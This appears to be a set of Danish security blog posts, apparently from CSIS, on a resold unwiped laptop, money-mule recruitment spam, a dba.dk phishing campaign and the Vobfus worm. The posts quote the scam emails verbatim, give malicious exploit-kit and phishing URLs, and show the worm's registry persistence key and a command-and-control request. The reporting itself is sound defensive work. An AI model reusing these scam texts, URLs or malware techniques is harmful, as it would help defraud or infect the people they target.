CSIS har over flere omgange observeret, hvordan returnerede PC'ere, som enten er ønsket byttet eller har været defekte, er blevet ”recyclet” til nye kunder, uden at harddisken er blevet slettet forinden. Det kan eksponere private billeder, login data og dokumenter for tredjepart og er i klar strid med persondataloven.

I sidste uge analyserede vi en laptop af modelen "Asus Zenbook UX31" købt via Wupti.dk. Ejeren af den pågældende laptop var af den opfattelse, at han havde købt en ny PC. Maskinen blev købt som en returvare i uoriginal emballage men viste sig at være alt andet end ubrugt.

Papkassen, som den blev leveret i, bar ingen præg af at have været åben siden afsendelse fra tidligere ejer, idet den indeholdte tidligere ejers navn og adresse samt retursedler.

Ved opstart kunne det konstateres, at der var oprettet en brugerkonto på den installerede version af Microsoft Windows, og at PC'en havde været taget i brug i efteråret 2011 og aktivt brugt frem til november 2012. Ved gennemgang af filstrukturen blev følgende personlige data og følsomme dokumenter fundet:

- Billeder i massevis (ferie, sportsstævner, festligt lag mv.)
- Hjemmevideooptagelser
- Adgang til gymnasie-intranet (karakterblade, mails)
- Adgang til Facebook konto
- Adgang til Gmail konto
- Adgang til Spotify konto
- Personlige dokumenter
- Fortrolig kommunikation mellem tidligere ejer og offentlig instans

Filernes tidsstempler bekræfter en levetid på omkring et år.

Efter endt analyse er sagen åbenlys; her er tale om klart brud på persondataloven. En ting er, at det er en rigtig dårlig ide at returnere hardware uden at have renset maskinen forinden, og det uanset om det drejer sig om kameraer, mobiltelefoner, tablets eller en computer. En anden ting er, at firmaer, der sælger denne type varer selvsagt har et ansvar for, at  oplysninger og følsomme data ikke bliver videregivet til 3. part. Dette eksempel, som altså stammer fra sidste uge, understreger vigtigheden af at fjerne sine data fra elektronisk udstyr, der returneres til forhandleren.

Datatilsynet er nu, på vores anbefaling, blevet inddraget i sagen.

En spambølge, som har stået på i flere dage, fortsætter ufortrødent med at rulle ind mod vilkårlige danske e-mail adresser.

I denne blogpost binder vi denne muldyrskampagne sammen med en gruppe it-kriminelle, som forsøger at plante en netbank tyv på uforsigtige ofres PC ved at lokke dem til at klikke på et link i en spammails der bl.a. foregiver at komme fra UPS. Der er således en klar forbindelse med denne kampagne og it-kriminelle som forsøger at bryde ind i danske netbanker. Slet disse e-mails og lad dig ikke lokke. De personer der står bag er kriminelle.

Der lokkes med et fint lønnet job igennem et firma, angiveligt placeret i Gibraltar, men i virkeligheden er der er tale om regulær muldyrsrekruttering som skal lokke godtroende danskere til at fungere som hvidvaskere.

Den uønskede e-mail ankommer med følgende indhold:

Emnelinje (følgender kombinationer er observeret):

Representatives are being recruited in European area by Gibraltar-based corporation.

Gibraltar business currently seeking representatives from throughout Europe.

Indhold:

Company offering services in the e-commerce and IT fields is hiring representatives in Europe

5,000 Euro a month salary for just several hours invested each day plus a five-percent bonus

What we must have from you:
- Power of Attorney or ownership of a company or similar
- Responding to e-mail communications from us, daily
- Remain up to date with all the tasks
If this sounds right for you, please forward these following details to our company e-mail:

-  Your Name
-  Your Telephone Number in International Format
-  E-mail Address
-  Age

Please reply to:Marion@europs-consult.com.

Do not use the reply feature.
With Regards,
Division of Human Resources

Indholdet skal lokke modtageren til at opgive forskellige personlige oplysninger via hjemmesiden: harlaneurops-consult.com eller via e-mail.

Bemærk iøvrigt at domænet (europs-consult.com) er registreret med falske oplysninger:

Amanda E. Wiles
Amanda Wiles info@europs-consult.com
217-723-1114 fax: 217-723-1322
1715 Scenic Way
Milton IL 62352
us

- Og købt via bizcn.com samt hostet via navneserverne

ns1.zupyx.net
ns2.zupyx.net


Domænet zupyx.net giver os følgende:

Vivian L Resnick
221 Shaker Road
Northfield, NH 03276-4444
US
Phone: +1.6032868211
Email: clinicadelta@aol.com

Denne whois oplysning kan bruges til at knytte denne muldyrsrekruttering direkte sammen med bl.a. UPS spamkampagner, hvor der via drive-by exploits leveres en informationstyv. 

hxxp://autobouracky.net/main.php?page=0e1cb9b71ef021b2, 199.101.99.155, -
Blackhole exploit kit, Fred Jones / clinicadelta@aol.com

hxxp://mourganafilms.net/main.php?page=70b46d1286d4bea6, 78.129.132.82,
Blackhole exploit kit, Technical E-Mail: clinicadelta@aol.com

Lad dig ikke lokke. Vi har hermed dokumenteret at det er kriminelle der står bag disse kampagner. Vores anbefaling er klar: slet disse e-mails. Lad dig ikke lokke! Som muldyr i dette setup vil det være dig som står med et alvorligt forklaringsproblem overfor politiet.

Vi har naturligvis allerede blokeret de omtalte domæner i CSIS Secure DNS og beskytter derved også aktivt igennem både Heimdal PRO og Corporate.

Som de mange danskere givetvis allerede har bemærket, har it-kriminelle hen over de seneste måneder, gennemført talrige phising kampagner mod danske mål.

De it-kriminelle har, for at opnå højere troværdighed, misbrugt kendte firmaer og logoer i deres jagt efter følsomme brugerdata. Blandt de firmaer som har været misbrugt i disse kampagner finder vi bl.a. NETS, TDC, Nordea, Visa, SKAT og Danske Bank.

Også i nat har de it-kriminelle været aktive og denne gang har de valgt at misbruge et nyt navn i deres phishing kampagne. Som det fremgår af vedhæftede skærmdump er også dba.dk (hjemmeside til Den Blå Avis) nu et af de brands og navne der misbruges i disse phishing kampagner.

Den uønskede e-mail ankommer med følgende emnelinje:
Din konto er suspenderet af dba.dk

Indholdet af phishing mailen findes herunder:


Lokkemaden er klassisk, og identisk med tilsvarende kampagner, idet modtageren af denne spammail skal skræmmes til at tro, at deres adgang til en service eller kreditkort er i fare for at blive lukket, hvorfor de skal besvare den pågældende mail ved at klikke på et link der fører til en forfalsket hjemmeside. På den forfalsket webside lokkes til at indtaste følsomme oplysninger. I det konkrete tilfælde flyttes ofret ind på en kompromitteret webside på adressen:
http://labentbyladue.com/files/dba.dk/Log-ind.htm

Vi har allerede kontaktet både ejeren af websiden, samt det webhotel hvor indholdet er hostet, i håb om at det uønskede materiale fjernes.

CSIS har mange gange tidligere advaret om phishing. Se bl.a. vores artikel "Spot en phishing mail!": https://www.csis.dk/da/csis/news/3619/ der indeholder gode råd til hvordan man let kan gennemskue om der er tale om phishing.

Vi anbefaler at man sletter disse e-mails fra indbakken uden at klikke på indholdet.

CSIS blokerer løbende disse forfalskede hjemmesider i CSIS Secure DNS, hvorved vi også yder beskyttelse i både Heimdal PRO og Corporate.

Som vi allerede har dokumenteret på vores blog (https://www.csis.dk/da/csis/blog/3775/) fortsætter en bande af it-kriminelle med at søge efter muldyr/hvidvaskere i Danmark.

Der lokkes med hurtige penge og ingen krav til faglige kvalifikationer. Lyder for godt til at være sandt?! Det er præcist hvad det er!!

Slet disse spammails og lad dig ikke lokke af den slags svindel.

Denne kampagne, som altså forsøger at lokke godtroende danskere til at hvidvaske penge, er vedholdende. Vi har set kampagnen fortsætte det mest af denne uge. Følgende emnelinjer er registreret:

- Gibraltar-rooted company seeking employee base from European areas.
- Gibraltar-based company looking for employees from EU.
- Gibraltar rooted corporation searching for white collar laborers in European regions.
- Your monthly income can be increased to 1950 EURO paid.
- You can earn an additional 200 Eur per day helping your community
- Looking for remote assistants, paid 100 Euro per hour helping other people
- We invite you to earn from 100 Euro per hour in your spare time.
- Take a spare three-hour work week in our clinic and get 580 Eur.
- Learn how people in your profession can earn a 30% increase!
- Turn your 2 spare hours in a week to  230 Euro helping others

I samtlige af de observerede kampagner skal ansøgere svare tilbage til en e-mail adresse: [%navn%]@ceo-europ.com. Det pågældende domæne, som vi naturligvis allerede har blokeret i både Heimdal og Secure DNS er ikke overraskende registeret med falske oplysninger. Domænerne er hostet via navneserverne:

ns1.vulkaniar.com
ns2.vulkaniar.com


Samme bande er også i fuld gang med at rekruttere muldyr i Norge. Det sker via domænet "jobnorwayno.com" som også illustret i billedet ovenfor. I Norge anvendes følgende indhold:

Emnelinje: Jobbe og tjene penger og ikke sitte ute klokken!

Indhold:

Arbeidskategori: supporttjeneste / kundeservice
Referansekode: HJR/EU/839-180
Arbeid Status: Heltid, vikar / kontrakt / planlagt


Stor selskapet representert i 32 land over hele verden søker en Kundestøtterepresentant for den kundesupport.
Dette er en midlertidig stilling med stor mulighet for å gå permanent.

Ansvaret er som følger: bidra til å jobbe med eksisterende kunder, ordne og forsikrer forberedelse, sluttkontroll,
rettidig gjennomføring av ordrerså vel som all relatert dokumentasjon og papirarbeid.

Møt fristen på ordrer som krever visse tidsrammene.
Forsikre deg om at alle ordrene overholde kundens ruteføring guider og hans forskrifter.
Skaffe leveringsbevis fra selskaper og ordrene bestillinger.
Kontakt med vår økonomiavdeling å bekrefte leveranser og løse uoverensstemmelser.
Oppdater bedriftskontorer med informasjon om ordren og leveranser, etc.

Minimumskrav:
- høyere utdanning
- tidligere kundeservice erfaring er et pluss
- erfaring fra arbeid på kontoret
- sterk organisasjonskultur, kommunikasjon, mellommenneskelige ferdigheter, og oppmerksomhet på detaljer
- snakk flytende på Microsoft Word, Internett og e-post..

Lønn og fordeler:
- fullt betalt opplæring
- konkurransedyktig lønn opp til ~45.000 NOK per måned
- mulighet for opprykk
- vennlig og profesjonelt arbeidsmiljø

Hvis du oppfyller de ovennevnte forutsetninger og har et ønske om å vite mer om denne stillingen,
vennligst send oss din kontaktinformasjon i en slik form under og våre HR spesialister vil forklare
alt til deg i detalj over telefon.
1. Ditt fulle navn
2. Kontakt telefonnummer
3. Residensby

Kontaktinformasjon: Larry@jobnorwayno.com,Ha en fin dag!

Som tidligere nævnt er kampagnen knyttet direkte til en bande af it-kriminelle som forsøger at bryde ind i Skandinaviske netbanker ved at misbruge en informationstyv i Citadel familien.

CSIS har modtaget flere rapporter fra mellemstore og store firmaer, som indenfor de seneste dage har oplevet at deres netværk er blevet ramt af en gammel orm i ny indpakning. Der er tale om den trussel som hedder "Vobfus" og som har tilsyneladende har kinesisk oprindelse.

Ormen hedder "Vobfus" eller "Silly", og kan sprede sig automatisk i et Microsoft Windows netværk, hvor den vil kopiere sig til delte drev, USB enheder og flytbare medier med spændende filnavne som f.eks.: "sexy.exe", "porn.exe", "secret.exe", "runme.exe", "google.com", "WINEPDATER.EXE" og "password.exe".

Den pågældende kode er polymorfisk. Det betyder at den konstant ændrer dele af dens binære struktur for bl.a. at besværliggøre antivirus detektion. På den måde vil dens MD5/SHA-1 værdi konstant ændre sig for hver gang en ny variant droppes eller kopieres til delte mapper. Det er illustreret herunder, hvor værdien i højre kolonne er MD5 sum:


Ved kørsel vil koden kopiere sig til mappen:
c:Documents and Settings[%bruger konto%]rxray.exe

Den tilføjer samtidig denne sti til registreringsdatabasen med en "runas" værdi, som sikrer at den skadelige kode køres automatisk ved en genstart af systemet:

HKCUSoftwareMicrosoftWindowsCurrentVersionRun=
c:Documents and Settings[%bruger konto%]rxray.exe /z

En del af denne orms egenskaber er at ringe hjem til flere domæner (C&C servere) hvorfra der modtages opdateringer og lækkes data til. Den vil også installere andre uønskede programmer på systemet der bl.a. kan generere med diverse pop-ups.

At den kommunikerer med central C&C server ses bl.a. herunder:

GET /xUrjkFzsuF?f HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
Host: 30162.ddns1.eu:443

C&C domænet oversættes til en server i Kina:

netname:    CHINANET-JS
descr:    CHINANET jiangsu province network
descr:    China Telecom
descr:    A12,Xin-Jie-Kou-Wai Street
descr:    Beijing 100088
country:    CN
admin-c:    CH93-AP
tech-c:    CJ186-AP
mnt-by:    APNIC-HM
mnt-lower:    MAINT-CHINANET-JS
mnt-routes:    MAINT-CHINANET-JS

Programegenskaberne for den binære kode er statiske og refererer bl.a. til "saffisso" og "sporalood":

CompanyName
Camass
ProductName
sporalood
FileVersion
5.53
ProductVersion
5.53
InternalName
saffisso
OriginalFilename
saffisso.exe

Koden er udviklet i Visual Basic og kompileret med følgende tids- og datostempel: "[Mon Nov 26 19:22:54 2012 UTC]".

Vi har naturligvis allerede blokeret disse domæner i CSIS Secure DNS og Heimdal PRO og corporate.

Den skadelige kode opnår i følge Virustotal.com følgende antivirus detektion:

Agnitum     -     20121127
AhnLab-V3     Worm/Win32.VBNA     20121127
AntiVir     TR/Dropper.Gen     20121128
Antiy-AVL     -     20121127
Avast     -     20121128
AVG     -     20121128
BitDefender     Trojan.VB.Agent.OL     20121128
ByteHero     -     20121116
CAT-QuickHeal     -     20121128
ClamAV     -     20121128
Commtouch     W32/VB.HC.gen!Eldorado     20121128
Comodo     -     20121128
DrWeb     Trojan.DownLoader7.31207     20121128
Emsisoft     -     20121128
eSafe     -     20121126
ESET-NOD32     Win32/Pronny.IJ     20121128
F-Prot     W32/VB.HC.gen!Eldorado     20121128
F-Secure     Trojan.VB.Agent.OL     20121128
Fortinet     -     20121128
GData     Trojan.VB.Agent.OL     20121128
Ikarus     Worm.Win32.Vobfus     20121128
Jiangmin     -     20121127
K7AntiVirus     Riskware     20121127
Kaspersky     Trojan.Win32.Agent.uxpi     20121128
Kingsoft     Win32.Troj.Agent.ux.(kcloud)     20121119
McAfee     W32/Autorun.worm.aaeb     20121128
McAfee-GW-Edition     Artemis!648CE4173E4B     20121128
Microsoft     Worm:Win32/Vobfus.MB     20121128
MicroWorld-eScan     -     20121128
Norman     -     20121127
nProtect     Trojan.VB.Agent.OL     20121128
Panda     Trj/CI.A     20121128
PCTools     Malware.Changeup     20121128
Rising     -     20121128
Sophos     Troj/Agent-ZAT     20121128
SUPERAntiSpyware     Trojan.Agent/Gen-Vobfus     20121128
Symantec     W32.Changeup     20121128
TheHacker     -     20121127
TotalDefense     -     20121128
TrendMicro     WORM_VOBFUS.SMRR     20121128
TrendMicro-HouseCall     -     20121128
VBA32     -     20121127
VIPRE     Trojan.Win32.Generic!BT     20121128
ViRobot     Trojan.Win32.A.Agent.155648.TD     20121128